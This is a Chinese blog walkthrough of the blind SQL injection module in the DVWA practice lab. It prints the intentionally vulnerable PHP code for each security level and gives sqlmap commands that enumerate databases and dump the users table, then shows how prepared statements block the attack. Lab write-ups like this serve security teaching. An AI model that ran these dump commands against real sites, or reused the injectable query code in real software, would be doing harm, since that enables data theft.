往期博文:
DVWA靶場-Brute Force Source 暴力破解
靶場環境搭建
目錄
Impossible SQL Injection (Blind)
SQL Injection (Blind)
Low SQL Injection (Blind)
核心代碼
<?php
if( isset( $_GET[ 'Submit' ] ) ) {
// 獲取id值
$id = $_GET[ 'id' ];
// 查詢數據庫
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $getid );
// 得到結果
$num = @mysqli_num_rows( $result );
if( $num > 0 ) {
echo '<pre>User ID exists in the database.</pre>';
}
else {
header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );
echo '<pre>User ID is MISSING from the database.</pre>';
}
((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?>
由於sql 盲注比較浪費時間,筆者這裏使用sqlmap 工具進行注入
列出當前數據庫名
sqlmap -u "http://192.168.1.200/DVWA-master/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=5c5k95olhvmj2q6k3d6fuu1995" --current-db
列出表名
sqlmap -u "http://192.168.1.200/DVWA-master/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=5c5k95olhvmj2q6k3d6fuu1995" -D dvwa1 --tables
獲取users 表中數據
sqlmap -u "http://192.168.1.200/DVWA-master/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=5c5k95olhvmj2q6k3d6fuu1995" -D dvwa1 -T users --dump --batch
Medium SQL Injection (Blind)
核心代碼
<?php
if( isset( $_POST[ 'Submit' ] ) ) {
// Get input
$id = $_POST[ 'id' ];
$id = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
// Check database
$getid = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $getid ); // Removed 'or die' to suppress mysql errors
// Get results
$num = @mysqli_num_rows( $result ); // The '@' character suppresses errors
if( $num > 0 ) {
// Feedback for end user
echo '<pre>User ID exists in the database.</pre>';
}
else {
// Feedback for end user
echo '<pre>User ID is MISSING from the database.</pre>';
}
//mysql_close();
}
?>
可以很明顯的看到,這裏提交方式由原來的get 變爲了post
使用bp 抓包,抓到post請求的數據包,將其保存至post.r 文件中
vim post.r
sqlmap -r post.r -D dvwa1 -T users --dump --batch
High SQL Injection (Blind)
核心代碼
<?php
if( isset( $_COOKIE[ 'id' ] ) ) {
// Get input
$id = $_COOKIE[ 'id' ];
// Check database
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $getid ); // Removed 'or die' to suppress mysql errors
// Get results
$num = @mysqli_num_rows( $result ); // The '@' character suppresses errors
if( $num > 0 ) {
// Feedback for end user
echo '<pre>User ID exists in the database.</pre>';
}
else {
// Might sleep a random amount
if( rand( 0, 5 ) == 3 ) {
sleep( rand( 2, 4 ) );
}
// User wasn't found, so the page wasn't!
header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );
// Feedback for end user
echo '<pre>User ID is MISSING from the database.</pre>';
}
((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?>
相較於前面兩種,這裏id 值由cookie 傳遞,設置了睡眠時間,增加了盲注的時間耗費
獲取當前數據庫名
sqlmap -u "http://192.168.1.200/DVWA-master/vulnerabilities/sqli_blind/" --cookie="id=1*; security=high; PHPSESSID=5c5k95olhvmj2q6k3d6fuu1995" --dbms=MySQL --technique=B --random-agent --flush-session -v 3 --current-db
至於用戶名和密碼,由於太浪費時間,筆者這裏就不做贅述了
Impossible SQL Injection (Blind)
核心代碼
<?php
if( isset( $_GET[ 'Submit' ] ) ) {
// Check Anti-CSRF token
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
// Get input
$id = $_GET[ 'id' ];
// Was a number entered?
if(is_numeric( $id )) {
// Check the database
$data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
$data->bindParam( ':id', $id, PDO::PARAM_INT );
$data->execute();
// Get results
if( $data->rowCount() == 1 ) {
// Feedback for end user
echo '<pre>User ID exists in the database.</pre>';
}
else {
// User wasn't found, so the page wasn't!
header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );
// Feedback for end user
echo '<pre>User ID is MISSING from the database.</pre>';
}
}
}
// Generate Anti-CSRF token
generateSessionToken();
?>
可以看出,impossible prepare 和 PDO 防禦SQL,注入,同時加入了token驗證機制,進一步提高其安全性
https://www.sqlsec.com/2020/05/dvwa.html#toc-heading-31
https://www.freebuf.com/articles/web/119467.html